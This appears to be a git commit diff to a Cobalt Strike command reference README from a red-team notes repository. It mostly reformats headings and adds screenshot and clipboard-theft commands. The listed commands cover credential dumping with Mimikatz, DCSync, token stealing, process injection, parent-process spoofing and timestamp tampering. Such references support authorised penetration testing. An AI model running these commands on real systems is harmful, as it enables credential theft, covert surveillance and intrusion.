Update README.md

bigb0sss · bigb0sss · commit 17ee4c6be66e · 2021-09-15T12:25:06.000-04:00
diff --git a/01-CobaltStrike/README.md b/01-CobaltStrike/README.md
@@ -4,13 +4,13 @@
 
 ## Command References
 
-#### Beacons
+### Beacons
 ##### Sleep
 ```css
 sleep 60 50               ; Sleep 60 sec with 50% of jitter (Call back between 30 to 60 secs randomly) 
 ```
 
-#### Command Execution
+### Command Execution
 ##### Default
 ```css
 run [command]
@@ -40,63 +40,63 @@ execute-assembly [/path/to/your.exe]        ; Running it from your localhost
 shell [command] [args]
 ```
 
-#### Session Passing
+### Session Passing
 ```css
 spawn [x86|x64] [Listener]
 inject [PID] [x86|x64] [Listener]
 ```
 
-#### Parent Process Modification
+### Parent Process Modification
 ```css
 ppid [Choice of your parent process (e.g., iexplore.exe)]
 spawnto [x86|x64] [New parent process]
 ```
 
-#### SMB Beacn
+### SMB Beacn
 ```css
 spawn [SMB-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") SMB beacon 
 inject [PID] [x86|x64] [SMB-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context
 ```
 
-#### TCP Beacn
+### TCP Beacn
 ```css
 spawn [TCP-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") TCP beacon 
                                             ; TCP beacons can be also run locally by clicking "Bind to localhost only" on GUI
 inject [PID] [x86|x64] [TCP-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context
 ```
 
-#### Credentials and Hashes
+### Credentials and Hashes
 ```css
 logonpasswords                              ; Run Mimikatz
 hashdump                                    ; Get SAM database hashes
 ```
 
-#### Mimikatz
+### Mimikatz
 ```css
 mimikatz [command] [args]                   ; Runs a Mimikatz command
 mimikatz ![command] [args]                  ; Elevate to SYSTEM and run Mimikatz command
 mimikatz @[command] [args]                  ; User current token to run Mimikatz command
 ```
-#### DCSync
+### DCSync
 ```css
 dcsync [domain] [DOMAIN\user]
 ```
 
-#### File Download
+### File Download
 ```css
 download [file]
 cancel [file|*]
 downloads
 View --> Downloads --> Sync Files
 ```
 
-#### File Upload
+### File Upload
 ```css
 upload [/path/to/file]
 timestomp [Destination] [Source]            ; Changing file's timestamps (*Do not recommend using it during the engagement) 
 ```
 
-#### Token Stealing
+### Token Stealing
 ```css
 ps                                          ; List process
 steal_token [PID]                           ; Stealing token
@@ -109,7 +109,7 @@ make_token DOMaIN\user password             ; Create a token. So when you do a m
                                             ; (maybe against DC) you will see that the maked token user.
 ```
 
-#### Kerberos Tickets
+### Kerberos Tickets
 ```css
 klist                                       ; See your current Kerberos tray 
 kerberos_ticket_purge                       ; Purge tickets
@@ -120,3 +120,16 @@ kerberos_ticket_user [/path/to/file.ticket] ; Load a ticket
 - Domain SID [whoami /user + drop last number]
 - NTLM hash of krbtgt user from DC
 ```
+
+### Screenshots
+```css
+screenshot [pid] <x84|x64>
+screenwatch [pid] <x84/x64>
+printscreen
+```
+
+### Keylogging / ClipboardTheft
+* [Start-ClipboardMonitor.ps1](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1)
+```css
+psinject <Process ID> x64 Start-ClipboardMonitor -CollectionLimit 5
+```
